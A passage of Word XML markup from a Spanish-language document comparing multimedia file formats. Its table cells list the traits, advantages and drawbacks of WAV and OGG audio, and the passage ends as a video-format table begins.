          <w:p w:rsidR="00715745" w:rsidRPr="00C36E8B" w:rsidRDefault="00715745" w:rsidP="00C36E8B">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eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Compresión: Los archivos WAV se pueden guardar con distintos tipos de compresión. Las más utilizadas son la compresión PCM y la </w:t>
            </w:r>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>compresión ADPCM. No obstante incluso definiendo un sistema de compresión, con un audio de cierta duración se genera un archivo excesivamente pesado.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00C36E8B" w:rsidRDefault="00715745" w:rsidP="00C36E8B">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eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">El formato WAV se suele utilizar para fragmentos muy cortos (no superiores a 3-4 segundos), </w:t>
            </w:r>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>normalmente en calidad mono y con una compresión Microsoft ADPCM 4 bits.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00C36E8B" w:rsidRDefault="00715745" w:rsidP="00C36E8B">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eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Puede contener otras resoluciones o incluso ser monofónicos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C36E8B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00C36E8B" w:rsidRDefault="00715745" w:rsidP="00C36E8B">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eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Se puede considerar mucho para grabar voces.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00C36E8B" w:rsidRDefault="00715745" w:rsidP="00C36E8B">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eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Se considera insuficiente para la música.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C36E8B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00C36E8B" w:rsidRDefault="00715745" w:rsidP="00C36E8B">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eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Las más comunes son a 16 bits y 44,1kHz.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00C36E8B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00C36E8B" w:rsidRDefault="00715745" w:rsidP="00C36E8B">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eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C36E8B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Las WAV monofónicos a 8 bits y 22kHz eran solo capaces de reproducir esta resolución.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715745" w:rsidRPr="00C86F82" w:rsidTr="003A2989">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1176" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E86B65" w:rsidRDefault="00E86B65" w:rsidP="00E86B65">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E86B65" w:rsidRDefault="00E86B65" w:rsidP="00E86B65">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E86B65" w:rsidRDefault="00E86B65" w:rsidP="00E86B65">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E86B65" w:rsidRDefault="00E86B65" w:rsidP="00E86B65">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E86B65" w:rsidRDefault="00E86B65" w:rsidP="00E86B65">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>OGG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>34290</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>1163870</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1085850" cy="1085850"/>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048" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00E86B65" w:rsidP="00E86B65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">OGG </w:t>
            </w:r>
            <w:r w:rsidR="00715745" w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">es un formato contenedor bitstream que ofrece alta eficiencia en el streaming y la compresión de archivos. Como la mayoría de formatos contenedores, Ogg encapsula datos </w:t>
            </w:r>
            <w:r w:rsidR="00715745" w:rsidRPr="00715745">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>comprimidos y no comprimidos permitiendo la interpolación de los datos de audio y video dentro de un solo formato conveniente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>El formato OGG ha sido desarrollado por la Fundación Xiph.org.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Es el formato más reciente y surgió como alternativa libre y de código abierto (a diferencia del formato MP3).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Muestra un grado de compresión similar al MP3, pero según los expertos en música la calidad de reproducción es ligeramente superior.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">No todos los reproductores multimedia son capaces de leer por defecto este formato. En algunos casos es necesario instalar los </w:t>
            </w:r>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>códecs o filtros oportunos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>El formato OGG puede contener audio y vídeo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Sería el equivalente al MP3 y WMA, pero libre y gratuito.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>El código de los códecs es abierto.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Está disponible para la comunidad, que puede seguir mejorándolo.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tiene excelentes tasas de compresión.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Calidad superior a la del WMA y muy superior al MP3.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Suena mejor que un MP3 a 192 Kbps</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Añade cierto brillo artificial en las frecuencias altas, siendo muy inferiores las pérdidas producidas por la teoría psico acústica.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3260" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>La compresión OGG lenta.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00715745" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00715745" w:rsidRPr="00E86B65" w:rsidRDefault="00715745" w:rsidP="00E86B65">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E86B65">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>No muchos reproductores pueden leer este formato.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002E3253" w:rsidRDefault="002E3253" w:rsidP="002E3253">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E3253" w:rsidRDefault="002E3253" w:rsidP="002E3253">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc514520848"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Video</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00454BA6" w:rsidRDefault="00454BA6" w:rsidP="00236265"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula5oscura-nfasis5"/>
        <w:tblpPr w:leftFromText="141" w:rightFromText="141" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="15"/>
        <w:tblW w:w="13462"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176"/>
        <w:gridCol w:w="1971"/>
        <w:gridCol w:w="1987"/>
        <w:gridCol w:w="2564"/>
        <w:gridCol w:w="2781"/>
        <w:gridCol w:w="2983"/>
      </w:tblGrid>
      <w:tr w:rsidR="006561C1" w:rsidRPr="007F0A48" w:rsidTr="006561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62" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="007F0A48" w:rsidRDefault="006561C1" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007F0A48">
              <w:t>VIDEO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C25E12" w:rsidRPr="007F0A48" w:rsidTr="006561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6" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Formato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="dxa"/>
          </w:tcPr>
